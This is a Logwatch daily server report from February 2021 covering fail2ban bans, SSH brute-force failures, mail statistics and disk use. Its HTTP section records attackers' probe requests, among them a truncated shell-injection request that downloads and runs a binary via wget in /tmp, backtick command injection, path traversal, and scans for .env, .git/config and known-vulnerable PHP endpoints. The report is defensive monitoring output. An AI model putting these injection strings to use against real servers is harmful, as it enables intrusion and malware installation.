################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Sun Feb 28 04:42:04 2021
Date Range Processed: yesterday
( 2021-Feb-27 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host:
h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [140:141]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
Connection attempts using mod_proxy:
125.72.95.251 -> zapf.wiki:443: 1 Time(s)
60.191.125.35 -> zapf.wiki:443: 1 Time(s)
A total of 8 sites probed the server
Requests with error response codes
400 Bad Request
null: 8 Time(s)
/config/getuser?index=0: 4 Time(s)
http://fuwu.sogou.com/404/index.html: 2 Time(s)
zapf.wiki:443: 2 Time(s)
../../proc/: 1 Time(s)
/cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_ ... _ntp_server=`cd: 1 Time(s)
/confirm/%s: 1 Time(s)
/op_type=ping&destination=cd: 1 Time(s)
/shell?cd+/tmp;rm+arm+arm7;wget+http:/\x5C ... +arm;./arm+jaws: 1 Time(s)
/w00tw00t.at.ISC.SANS.DFind:): 1 Time(s)
7: 1 Time(s)
;q\xDB\xB66\xB1\x13_DT\x22\xE6\x95\x0F\x8E ... \xB0GYh\xF1\x00: 1 Time(s)
X\xD4>\x12\x98\xC4<\xE0\x13\xCF\x00\xAC\xA ... 5Cs\x9C\xBD\xCB: 1 Time(s)
\x83tB\xCC\xAC\xF0`\x96\xD8\x9D\xCE\x88\xF ... A\x1A\x01oX\xA0: 1 Time(s)
\x84\xB4,\x85\xAFn\xE3Y\xBBbhl\xFF(=':\xA9 ... B9\x90\x00(\xC0: 1 Time(s)
\x8E\x1D\x97\x1E\x05{\x1A\xCB\xF2\x1E\xB0> ... 00x\x95\x9F\xCE: 1 Time(s)
404 Not Found
/robots.txt: 97 Time(s)
/wp-login.php: 6 Time(s)
/.git/config: 4 Time(s)
/reader/1993-wi-reader_st93.pdf: 4 Time(s)
/.env: 3 Time(s)
/berichte/WiSe14/Bericht_WiSe14-Bremen.pdf: 3 Time(s)
/download/zapfev_satzung.pdf: 3 Time(s)
/resolutionen/sose17/gesellschaftlich_vera ... wantwortung.pdf: 3 Time(s)
/ads.txt: 2 Time(s)
/wp-content/: 2 Time(s)
//2019/wp-includes/wlwmanifest.xml: 1 Time(s)
//2020/wp-includes/wlwmanifest.xml: 1 Time(s)
//blog/wp-includes/wlwmanifest.xml: 1 Time(s)
//cms/wp-includes/wlwmanifest.xml: 1 Time(s)
//news/wp-includes/wlwmanifest.xml: 1 Time(s)
//shop/wp-includes/wlwmanifest.xml: 1 Time(s)
//site/wp-includes/wlwmanifest.xml: 1 Time(s)
//sito/wp-includes/wlwmanifest.xml: 1 Time(s)
//test/wp-includes/wlwmanifest.xml: 1 Time(s)
//web/wp-includes/wlwmanifest.xml: 1 Time(s)
//website/wp-includes/wlwmanifest.xml: 1 Time(s)
//wordpress/wp-includes/wlwmanifest.xml: 1 Time(s)
//wp-includes/wlwmanifest.xml: 1 Time(s)
//wp/wp-includes/wlwmanifest.xml: 1 Time(s)
//wp1/wp-includes/wlwmanifest.xml: 1 Time(s)
//wp2/wp-includes/wlwmanifest.xml: 1 Time(s)
//xmlrpc.php?rsd: 1 Time(s)
/downloader: 1 Time(s)
/home/verein: 1 Time(s)
/home/zapf: 1 Time(s)
/humans.txt: 1 Time(s)
499 (undefined)
/apple-touch-icon.png: 1 Time(s)
/favicon.png: 1 Time(s)
500 Internal Server Error
/: 66 Time(s)
/.env: 5 Time(s)
/sitemap.txt: 5 Time(s)
/robots.txt: 4 Time(s)
/atom.xml: 3 Time(s)
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s)
/.well-known/security.txt: 1 Time(s)
/?XDEBUG_SESSION_START=phpstorm: 1 Time(s)
/Autodiscover/Autodiscover.xml: 1 Time(s)
/_ignition/execute-solution: 1 Time(s)
/admin//config.php: 1 Time(s)
/api/jsonws/invoke: 1 Time(s)
/console/: 1 Time(s)
/dns-query: 1 Time(s)
/dns-query?dns=AAABAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB: 1 Time(s)
/index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s)
/mifs/.;/services/LogService: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
/sitemap_index.xml: 1 Time(s)
/wp-content/plugins/wp-file-manager/readme.txt: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
Invalid Users:
Unknown Account: 20 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
12 Miscellaneous warnings
19.283K Bytes accepted 19,746
19.283K Bytes sent via SMTP 19,746
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
2 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
2 Total 4xx Rejects 100.00%
======== ==================================================
78 Connections
1 Connections lost (inbound)
78 Disconnections
1 Removed from queue
1 Sent via SMTP
3 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Disconnecting after too many authentication failures for user:
root : 58 Time(s)
Failed logins from:
Illegal users from:
undef: 11 times
**Unmatched Entries**
fatal: no matching cipher found: client aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc,none server aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com [preauth] : 1 time(s)
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop47755p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################